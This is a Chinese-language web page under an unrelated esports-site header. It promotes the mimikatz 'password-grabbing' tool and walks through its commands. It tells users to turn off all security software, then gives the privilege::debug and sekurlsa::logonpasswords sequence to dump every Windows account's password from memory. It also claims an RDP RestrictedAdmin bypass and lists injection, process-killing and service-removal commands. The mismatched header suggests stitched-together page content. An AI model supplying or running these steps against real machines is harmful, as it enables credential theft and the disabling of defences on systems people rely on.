雷火电竞官网-中国知名电竞赛事平台

　　mimikatz是一款可對內存密碼進行破解的軟件，使用這款軟件能夠輕松破解內存密碼，操作簡單快捷。是一個簡單且好用的windows密碼抓取神器，它可幫助用戶一鍵抓取window密碼，其具有操作簡單、使用方便等特點。新版能夠通過獲取的kerberos登錄憑據，繞過支持RestrictedAdmin模式的win8或win2012svr的遠程終端(RDP) 的登陸認證。建議默認禁止RestrictedAdmin模式登錄。使用mimikatz2.0請關閉本機所有的安全軟件，因為其屬于黑客程序，安全軟件不退出就無法運行。

【使用說明】

　　獲取windows密碼的方法很簡單，mimikatz2.0版本的只需要兩條命令就可以了：

　　1、首先打開mimikatz2.0，該版本分為32位和64位，用戶可根據自己計算機的操作系統進行相應選擇，若不知道自己的操作系統位數，請鼠標右鍵點擊“計算機”-“屬性”，在系統類型中即可知曉

　　2、打開之后先輸入privilege::debug //提升權限

　　2、再輸入sekurlsa::logonpasswords //抓取密碼

　　3、獲取本機的所有賬號的Windows密碼

【命令介紹】

　　一、常規的操作使用命令

　　1.mimikatz # cls -->清屏,類似dos命令cls

　　2.mimikatz # exit -->退出mimikatz

　　3.mimikatz #version -->查看當前的mimikatz的版本

　　二、系統方面的操作使用命令:system

　　1.mimikatz #system::user -->查看當前登錄的系統用戶

　　2.mimikazt #system::computer -->返回當前的計算機名稱

　　三、在服務器終端的操作命令: ts

　　1.mimikatz #ts::sessions -->顯示當前的會話

　　2.mimikatz #ts::processes windows-d.vm.nirvana.local -->顯示服務器的進程和對應的pid情況等

　　四、系統服務相關的操作使用命令:service

　　五、系統進程相關操作的使用命令:process

　　六、系統線程相關操作使用命令:thread

　　七、系統句柄相關操作使用命令:handle

　　八、加密相關操作使用命令:crypto

　　九、注入操作使用命令:inject

　　十、其他基礎命令

　　1.cls清屏

　　2.exit退出

　　3.version查看mimikatz的版本

　　4.help查看幫助信息

　　5.system::user查看當前登錄的系統用戶

　　6.system::computer查看計算機名稱

　　7.process::list列出進程

　　8.process::suspend進程名稱 暫停進程

　　9.process::stop進程名稱 結束進程

　　10.process::modules列出系統的核心模塊及所在位置

　　11.service::list列出系統的服務

　　12.service::remove移除系統的服務

　　13.service::start stop服務名稱 啟動或停止服務

　　14.privilege::list列出權限列表

　　15.privilege::enable激活一個或多個權限

　　16.privilege::debug提升權限

　　17.nogpo::cmd打開系統的cmd.exe

　　18.nogpo::regedit打開系統的注冊表

　　19.nogpo::taskmgr打開任務管理器

　　20.ts::sessions顯示當前的會話

　　21.ts::processes顯示進程和對應的pid情況等

　　22.sekurlsa::tspkg獲取tspkg用戶信息及密碼

　　23.sekurlsa::logonPasswords獲登陸用戶信息及密碼